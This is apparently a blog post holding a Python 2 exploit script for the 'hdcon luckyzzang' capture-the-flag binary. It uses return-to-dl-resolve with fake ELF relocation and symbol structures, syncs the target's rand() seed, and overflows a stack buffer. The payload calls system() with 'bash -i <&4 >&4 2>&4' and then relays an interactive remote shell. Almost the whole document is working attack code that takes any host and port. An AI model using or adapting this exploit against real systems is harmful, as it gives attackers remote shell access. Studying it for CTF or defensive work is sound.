
hdcon luckyzzang exploit (return-to-dl, exploit only, local)

진모씨 2014. 2. 17. 16:25

import ctypes
import select
import struct
import sys
import time
from socket import *


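library = ctypes.CDLL('libc.so.6')


def _lucky_number(libc, threshold=70, margin=0.5):
    """Return the first rand() % 100 above `threshold` obtained after srand(time(0)).

    The target (presumably) seeds its PRNG the same way and uses rand() % 100 to
    size the read that stage 0 fills, so the value only matches while both sides
    call time(0) inside the same wall-clock second.  The original loop could
    accept a value in the last milliseconds of a second and then connect in the
    next one; `margin` refuses the final `margin` seconds of each second so the
    connect() that follows still lands in the second that was seeded.

    Note: time(0) comes back through ctypes' default C-int return type, which is
    the same truncation srand(unsigned int) applies on the target.
    """
    while True:
        if time.time() % 1.0 > 1.0 - margin:
            time.sleep(0.01)          # too close to the next tick -- wait it out
            continue
        libc.srand(libc.time(0))
        value = libc.rand() % 100
        if value > threshold:
            return value


i = _lucky_number(library)   # 71..99; stage 0 is padded to 1025 + i bytes further down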


# --- fixed addresses in the target (i386, non-PIE) ---
BSS = 0x804A028
buffer = BSS + 160          # scratch space in .bss that stage 1 is recv()'d into
                            # (shadows the Python 2 builtin of the same name; kept for the rest of the script)
target = 0x804A040          # GOT slot behind recv@plt; r_offset of the fake relocation, i.e. what the resolver overwrites
plt = 0x80485F0             # recv@plt
recv = plt                  # same address under the name used in the stage-0 frame
stacklift = 0x080489CC      # gadget recv() returns into (the author calls it "leave + ret")

# dynamic-linking tables the fake Elf32_Rel / Elf32_Sym are expressed relative to
dynstr = 0x804831C
jmprel = 0x8048418
symtab = 0x80481CC


def p(x):
    """Pack `x` as a little-endian 32-bit unsigned value (a dword on the i386 target)."""
    return struct.pack("<L", x)


def ph(x):
    """Pack `x` as a little-endian 32-bit unsigned value.

    Despite the name this is NOT a half-word: "<I" is four bytes, so ph() and p()
    emit identical output.  The fake Elf32_Sym below is laid out counting on that
    width.
    """
    return struct.pack("<I", x)


def pb(x):
    """Pack `x` as a single byte."""
    return struct.pack("<B", x)


def log(x):
    """Write `x` plus a newline to stderr (stdout is left for the target's output)."""
    return sys.stderr.write(x + '\n')


######## rel ##############################################


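# Fake Elf32_Rel that the resolver is pointed at through the relocation offset
# pushed in stage 0.  r_offset is the GOT slot the resolved address is written
# to; r_info packs the index of our fake Elf32_Sym (placed at buffer + SYM_OFFSET
# by the stage-1 layout) with the JUMP_SLOT relocation type.
SYM_OFFSET = 20              # must match the padding in front of `sym` in stage 1
R_386_JMP_SLOT = 7

# The resolver locates the symbol as symtab + 16 * index, so the fake entry has
# to sit on the 16-byte stride of .dynsym -- otherwise a shifted, garbage
# Elf32_Sym is read.  divmod also keeps this integral under Python 3, where the
# original `/ 16` would yield a float.
sym_index, misalign = divmod(buffer + SYM_OFFSET - symtab, 16)
if misalign:
    raise SystemExit("fake Elf32_Sym at buffer+%d is %d bytes off the .dynsym stride"
                     % (SYM_OFFSET, misalign))
# NOTE(review): if the binary carries a .gnu.version table the resolver also
# reads versym[sym_index]; nothing here controls that entry -- confirm the
# target has none or that the entry is benign.

rel  = p(target)                               # r_offset
rel += p((sym_index << 8) | R_386_JMP_SLOT)    # r_info = ELF32_R_INFO(sym_index, R_386_JMP_SLOT)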


######## sym ##############################################


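# Fake Elf32_Sym, read by the resolver at symtab + 16 * index == buffer + SYM_OFFSET.
# Layout: st_name(4) st_value(4) st_size(4) st_info(1) st_other(1) st_shndx(2)
# = 16 bytes, immediately followed by the NUL-terminated name it points at.
# The original packed st_shndx with a 4-byte "<I" (18-byte struct) and hard-coded
# a compensating string offset of 38; here the struct is a real 16-byte
# Elf32_Sym and st_name is derived from the layout so the two cannot drift.
SYM_OFFSET = 20                      # must match the padding in front of `sym` in stage 1
name_offset = SYM_OFFSET + 16        # "system\0" directly follows the struct

sym = struct.pack("<IIIBBH",
                  buffer + name_offset - dynstr,   # st_name: offset of our string from .dynstr
                  0xff,                            # st_value: only used if the resolver skips the lookup
                  0xff,                            # st_size
                  0xf0,                            # st_info
                  0xc0,                            # st_other: author's note says "must be 0" -- presumably the
                                                   #   visibility bits (low two), which 0xc0 leaves clear; verify
                  0xffff)                          # st_shndx
sym += "system\x00"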


######## connect ##########################################


# Client socket to the target service, plus a running count of the bytes
# pushed through send() (reported once the exploit has landed).
s = socket(family=AF_INET, type=SOCK_STREAM)
cnt = 0

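def send(x):
    """Send all of `x` to the target and add its length to the running count `cnt`.

    socket.send() may hand over fewer bytes than requested; sendall() loops until
    everything has been written (or raises), so `cnt` only counts bytes that
    really went out and a short write cannot silently truncate a stage.
    """
    global cnt
    s.sendall(x)
    cnt += len(x)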


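# Where the service listens.  The defaults match the local challenge setup; pass
# `HOST PORT` on the command line to aim elsewhere.  '0.0.0.0' only works as a
# *destination* on Linux (the kernel routes it to the local host), and the seed
# sync above assumes the target shares this machine's clock and libc, so a
# remote target is unlikely to read the same number of bytes.
host = sys.argv[1] if len(sys.argv) > 1 else '0.0.0.0'
port = int(sys.argv[2]) if len(sys.argv) > 2 else 7777
s.connect((host, port))
banner = s.recv(1024)     # no timeout: a silent service hangs the exploit here
print banner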


######## payload (stage 1) ################################


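# ---- stage 1: what the stage-0 frame makes the target recv() into `buffer` ----
#   +0            fake Elf32_Rel (rel, 8 bytes)
#   +SYM_OFFSET   fake Elf32_Sym (sym); rel's symbol index is computed for this offset
#   +cmd_offset   the command system() runs
SYM_OFFSET = 20
# fd 4 is assumed to be the accepted client socket on the target -- the same
# descriptor stage 0 hands to recv().
cmd = "bash -i <&4 >&4 2>&4 ##"

if len(rel) > SYM_OFFSET:
    raise SystemExit("fake Elf32_Rel is %d bytes; it must fit in the %d bytes before the symbol"
                     % (len(rel), SYM_OFFSET))

payload = rel
payload += "A" * (SYM_OFFSET - len(payload))
payload += sym
cmd_offset = len(payload)            # system()'s argument starts here
payload += cmd + "\x00"              # explicit terminator: do not rely on .bss past the payload being zero

# ---- stage 0: the overflow ----
# 0x408 bytes fill the vulnerable function's stack buffer; the words after it are
# consumed as its saved frame pointer, its return address and the frames of the
# calls chained behind it.
#
# NOTE(review): `stacklift` is labelled "leave + ret" by the author, but for the
# slots below to line up it has to discard recv()'s four arguments and return
# into the word after them -- verify the gadget at that address before reuse.
# NOTE(review): as laid out, the first system() call sees the 0 word as its
# argument and returns into recv@plt, whose GOT slot (`target`) the resolver has
# just overwritten with system; that second call gets `buffer + cmd_offset` as
# its argument (and 0 as a return address) and is the one that spawns the shell
# -- presumably; confirm with a debugger.
plt0_jmp = 0x80485FB                 # == plt + 11: the `jmp PLT0` tail of recv@plt, entered past its own `push <index>`

frame = [
    p(buffer),                       # saved EBP
    p(recv),                         # return address: recv@plt
    p(stacklift),                    # recv() returns here
    p(4),                            # recv(4,
    p(buffer),                       #      buffer,
    p(len(payload)),                 #      len(stage 1),
    p(0),                            #      0)
    p(plt0_jmp),                     # into the resolver with *our* relocation offset on the stack
    p(buffer - jmprel),              # relocation offset: jmprel + this == buffer, i.e. the fake Elf32_Rel
    p(plt),                          # system()'s return address: recv@plt, now bound to system
    p(0),                            # system()'s first argument slot (see note above)
    p(buffer + cmd_offset),          # the command string
]
stage0 = "A" * 0x408 + "".join(frame)

# The target presumably reads exactly 1025 + rand() % 100 bytes, with rand()
# synced by `i` at the top; pad to that size and refuse to silently truncate.
wanted = 1025 + i
if len(stage0) > wanted:
    raise SystemExit("stage 0 is %d bytes but the target only reads %d" % (len(stage0), wanted))
stage0 += "B" * (wanted - len(stage0))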


############################################################


raw_input()          # pause: attach a debugger to the target before the overflow goes out

# Both stages go back-to-back on the same stream: stage 0 fills the 1025 + i
# bytes the target reads first, stage 1 is picked up by the recv() that the
# stage-0 frame calls.
for stage in (stage0, payload):
    send(stage)

print s.recv(1024)
print 'Payload : %d Bytes' % cnt


# SHELL IN PYTHON

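def _drain(sock, quiet=0.5, chunk=102400):
    """Relay everything `sock` sends until it has been silent for `quiet` seconds.

    The original issued two blocking recv() calls per command, which hangs for
    good whenever the shell's output arrives in a single segment (the second
    recv() then waits for data that never comes).  Polling with select() returns
    as soon as the shell goes quiet instead.  Exits the script when the peer
    closes the connection.
    """
    while True:
        readable, _, _ = select.select([sock], [], [], quiet)
        if not readable:
            return
        data = sock.recv(chunk)
        if not data:                        # orderly shutdown by the peer
            raise SystemExit("connection closed")
        sys.stdout.write(data)
        sys.stdout.flush()


# Line-oriented relay between this terminal and the shell on the target.
while True:
    try:
        line = raw_input()
    except EOFError:                        # Ctrl-D: leave cleanly instead of a traceback
        break
    send(line + '\n')
    _drain(s)
s.close()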